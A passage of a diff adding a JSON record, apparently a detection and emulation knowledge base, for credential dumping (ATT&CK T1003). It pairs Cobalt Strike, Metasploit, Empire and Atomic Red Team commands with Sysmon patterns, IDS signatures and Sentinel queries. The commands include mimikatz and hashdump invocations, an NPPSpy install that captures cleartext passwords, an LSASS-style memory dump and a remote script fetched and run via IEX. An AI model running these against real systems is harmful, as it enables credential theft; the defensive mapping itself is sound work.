+ "python/collection/osx/kerberosdump", + "python/management/multi/kerberos_inject", + "python/situational_awareness/network/dcos/etcd_crawler" + ], + "commands": [ + { + "command": "hashdump\nmimikatz !lsadump::sam", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "hashdump\nrun hashdump\nrun smart_hashdump\npost/windows/gather/credentials/domain_hashdump", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "logonpasswords\nmimikatz !sekurlsa::logonpasswords\nmimikatz !sekurlsa::msv\nmimikatz !sekurlsa::kerberos\nmimikatz !sekurlsa::wdigest", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "use mimikatz\nwdigest\nmsv\nkerberos\nlogonpasswords", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "PathToAtomicsFolder\\T1003\\bin\\gsecdump.exe -a\n", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": "#{gsecdump_exe} -a\n", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": "Copy-Item \"$env:Temp\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name 
\"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": "$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)\nif($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }\nC:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $id $env:TEMP\\svchost-exe.dmp full\n", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n", + "source": "data/abilities/credential-access/3c647015-ab0a-496a-8847-6ab173cd2b22.yml", + "name": "Custom GO credential dumper using minidumpwritedump" + }, + { + "command": "ntdsutil.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "HKLM\\SAM|HKLM\\Security\\\\Windows\\\\.+\\\\lsass.exe", + "source": "SysmonHunter - Credential Dumping", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\bcryptprimitives.dll|\\\\Windows\\\\.+\\\\bcrypt.dll|\\\\Windows\\\\.+\\\\ncrypt.dll", + "source": "SysmonHunter - Credential Dumping", + "name": "" + }, + { + "command": "powershell/collection/ChromeDump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/FoxDump", + "source": 
"https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/ninjacopy", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/add_keepass_config_trigger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/find_keepass_config", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/get_keepass_config_trigger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/keethief", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/remove_keepass_config_trigger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/enum_cred_store", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/cache", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/command", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": 
"powershell/credentials/mimikatz/dcsync", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/dcsync_hashdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/extract_tickets", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/golden_ticket", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/logonpasswords", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/lsadump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/mimitokens", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/sam", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/silver_ticket", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/trust_keys", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + 
"command": "powershell/credentials/powerdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/vault_credential", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/downgrade_account", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/wdigest_downgrade", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/gpp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/mcafee_sitelist", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/hashdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/mimipenguin", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/hashdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/kerberosdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/multi/kerberos_inject", + "source": 
"https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/etcd_crawler", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1003", + "Built-in Windows Command": "", + "Cobalt Strike": "hashdump\nmimikatz !lsadump::sam", + "Metasploit": "hashdump\nrun hashdump\nrun smart_hashdump\npost/windows/gather/credentials/domain_hashdump", + "Description": "Dumps hashes from the SAM Hive file." + }, + { + "Category": "T1003", + "Built-in Windows Command": "", + "Cobalt Strike": "logonpasswords\nmimikatz !sekurlsa::logonpasswords\nmimikatz !sekurlsa::msv\nmimikatz !sekurlsa::kerberos\nmimikatz !sekurlsa::wdigest", + "Metasploit": "use mimikatz\nwdigest\nmsv\nkerberos\nlogonpasswords", + "Description": "This technique injects into the LSASS.exe process and scrapes its memory for plaintext passwords of logged on users. You must do this from a high integrity process. \nThe Mimikatz project has a lot of different capabilities (https://github.com/gentilkiwi/mimikatz/wiki) such as pass-the-hash, pass-the-ticket, creating silver/golden tickets, dumping credentials, and elevating a process." + }, + { + "attack_technique": "T1003", + "display_name": "OS Credential Dumping", + "atomic_tests": [ + { + "name": "Gsecdump", + "auto_generated_guid": "96345bfc-8ae7-4b6a-80b7-223200f24ef9", + "description": "Dump credentials from memory using Gsecdump.\n\nUpon successful execution, you should see domain\\username's followed by two 32 character hashes.\n\nIf you see output that says \"compat: error: failed to create child process\", execution was likely blocked by Anti-Virus. 
\nYou will receive only error output if you do not run this test from an elevated context (run as administrator)\n\nIf you see a message saying \"The system cannot find the path specified\", try using the get-prereq_commands to download and install Gsecdump first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "gsecdump_exe": { + "description": "Path to the Gsecdump executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003\\bin\\gsecdump.exe" + }, + "gsecdump_bin_hash": { + "description": "File hash of the Gsecdump binary file", + "type": "String", + "default": "94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC" + }, + "gsecdump_url": { + "description": "Path to download Gsecdump binary file", + "type": "Url", + "default": "https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Gsecdump must exist on disk at specified location (#{gsecdump_exe})\n", + "prereq_command": "if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$parentpath = Split-Path \"#{gsecdump_exe}\"; $binpath = \"$parentpath\\gsecdump-v2b5.exe\"\nIEX(IWR \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1\" -UseBasicParsing)\nif(Invoke-WebRequestVerifyHash \"#{gsecdump_url}\" \"$binpath\" #{gsecdump_bin_hash}){\n Move-Item $binpath \"#{gsecdump_exe}\"\n}\n" + } + ], + "executor": { + "command": "#{gsecdump_exe} -a\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Credential Dumping with NPPSpy", + "auto_generated_guid": "9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6", + "description": "Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.\nAfter user's logging in cleartext password is 
saved in C:\\NPPSpy.txt.\nClean up deletes the files and reverses Registry changes.\nNPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "NPPSpy.dll must be available in local temp directory", + "prereq_command": "if (Test-Path \"$env:Temp\\NPPSPY.dll\") {exit 0} else {exit 1}", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile \"$env:Temp\\NPPSPY.dll\"" + } + ], + "executor": { + "command": "Copy-Item \"$env:Temp\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. 
Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "cleanup_command": "$cleanupPath = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER \n$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''\nSet-ItemProperty -Path $cleanupPath.PSPath -Name \"PROVIDERORDER\" -Value $cleanupUpdatedValue\nRemove-Item -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\" -Recurse -ErrorAction Ignore\nRemove-Item C:\\NPPSpy.txt -ErrorAction Ignore\nRemove-Item C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump svchost.exe to gather RDP credentials", + "auto_generated_guid": "d400090a-d8ca-4be0-982e-c70598a23de9", + "description": "The svchost.exe contains the RDP plain-text credentials.\nSource: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\n\nUpon successful execution, you should see the following file created $env:TEMP\\svchost-exe.dmp.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)\nif($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }\nC:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $id $env:TEMP\\svchost-exe.dmp full\n", + "cleanup_command": "Remove-Item $env:TEMP\\svchost-exe.dmp -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "3c647015-ab0a-496a-8847-6ab173cd2b22", + "name": "MiniDumpWriteDump (Spooky)", + "description": "Custom GO credential dumper using minidumpwritedump", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003", + "name": "OS Credential Dumping" + }, + "platforms": { + "windows": { + "psh": { + "command": ".\\totallylegit.exe 
#{host.process.id} C:\\Users\\Public\\creds.dmp\n", + "payloads": [ + "totallylegit.exe" + ], + "cleanup": "if (Test-Path \"C:\\Users\\Public\\creds.dmp\") {\n rm \"C:\\Users\\Public\\creds.dmp\" -Force;\n};\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.process.id" + } + ] + } + ] + }, + { + "chain_id": "100053", + "os": "windows", + "parent_process": "ntdsutil.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "ntds.dit", + "frequency": "rare", + "mitre_caption": "credential dumping", + "mitre_attack": "T1003", + "itw_sample": "" + }, + { + "name": "Credential Dumping", + "description": null, + "level": "critical", + "phase": "Credential Access", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "HKLM\\SAM|HKLM\\Security" + } + }, + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\lsass.exe", + "flag": "regex", + "op": "not" + } + }, + "op": "and" + }, + { + "type": "file", + "file": { + "path": { + "pattern": "\\\\Windows\\\\.+\\\\bcryptprimitives.dll|\\\\Windows\\\\.+\\\\bcrypt.dll|\\\\Windows\\\\.+\\\\ncrypt.dll", + "flag": "regex" + } + } + } + ] + }, + { + "Empire Module": "powershell/collection/ChromeDump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/ChromeDump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/FoxDump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/FoxDump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/ninjacopy", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python 
Dictionary": "\"powershell/collection/ninjacopy\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/add_keepass_config_trigger", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/add_keepass_config_trigger\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/find_keepass_config", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/find_keepass_config\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/get_keepass_config_trigger", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/get_keepass_config_trigger\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/keethief", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/keethief\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/remove_keepass_config_trigger", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/remove_keepass_config_trigger\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/enum_cred_store", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/enum_cred_store\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/cache", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python 
Dictionary": "\"powershell/credentials/mimikatz/cache\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/command", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/command\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/dcsync", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/dcsync\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/dcsync_hashdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/dcsync_hashdump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/extract_tickets", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/extract_tickets\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/golden_ticket", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "T1097", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/golden_ticket\": [\"T1003\",\"T1097\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/logonpasswords", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/logonpasswords\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/lsadump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": 
"\"powershell/credentials/mimikatz/lsadump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/mimitokens", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/mimitokens\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/sam", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/sam\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/silver_ticket", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "T1097", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/silver_ticket\": [\"T1003\",\"T1097\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/trust_keys", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/trust_keys\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/powerdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/powerdump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/vault_credential", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/vault_credential\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/management/downgrade_account", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/management/downgrade_account\": [\"T1003\"]," + }, + { + "Empire Module": 
"powershell/management/wdigest_downgrade", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/management/wdigest_downgrade\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/privesc/gpp", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/privesc/gpp\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/privesc/mcafee_sitelist", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/privesc/mcafee_sitelist\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/linux/hashdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/linux/hashdump\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/linux/mimipenguin", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/linux/mimipenguin\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/osx/hashdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/osx/hashdump\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/osx/kerberosdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/osx/kerberosdump\": [\"T1003\"]," + }, + { + "Empire Module": "python/management/multi/kerberos_inject", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": 
"\"python/management/multi/kerberos_inject\": [\"T1003\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/etcd_crawler", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/etcd_crawler\": [\"T1003\"]," + }, + { + "Rules": "ET Open", + "SID": "2027435", + "Signature": "ET ATTACK\\_RESPONSE Windows 64bit procdump Dump File Exfiltration", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2027436", + "Signature": "ET ATTACK\\_RESPONSE Windows 32bit procdump Dump File Exfiltration", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029330", + "Signature": "ET MALWARE Mimikatz x86 Executable Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029331", + "Signature": "ET MALWARE Mimikatz x64 Executable Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029332", + "Signature": "ET MALWARE Mimikatz x86 Mimidrv.sys File Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029333", + "Signature": "ET MALWARE Mimikatz x64 Mimidrv.sys File Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029334", + "Signature": "ET MALWARE Mimikatz x86 Executable Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029335", + "Signature": "ET MALWARE Mimikatz x64 Executable Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029336", + "Signature": "ET MALWARE Mimikatz x86 Mimidrv.sys Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029337", + "Signature": "ET MALWARE Mimikatz x64 Mimidrv.sys Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2010783", + "Signature": "ET EXPLOIT GsecDump executed", + "Verified": "NO" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + 
"query": "Sysmon| where EventID == 7and (module_loaded contains \"C:\\\\Windows\\\\System32\\\\samlib.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\WinSCard.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\cryptdll.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\hid.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\vaultcli.dll\")and (process_path !contains \"\\\\Sysmon.exe\"or process_path !contains \"\\\\svchost.exe\"or process_path !contains \"\\\\logonui.exe\")", + "name": "Credential Dumping ImageLoad" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"Invoke-Mimikatz -DumpCreds\"or process_command_line contains \"gsecdump -a\"or process_command_line contains \"wce -o\"or process_command_line contains \"procdump -ma lsass.exe\"or process_command_line contains \"ntdsutil*ac i ntds*ifm*create full\")", + "name": "Credential Dumping Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 10 and target_process_path contains \"C:\\\\Windows\\\\system32\\\\lsass.exe\"and (process_granted_access contains \"0x1010\"or process_granted_access contains \"0x1410\"or process_granted_access contains \"0x147a\"or process_granted_access contains \"0x143a\")and process_call_trace contains \"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"and process_call_trace contains 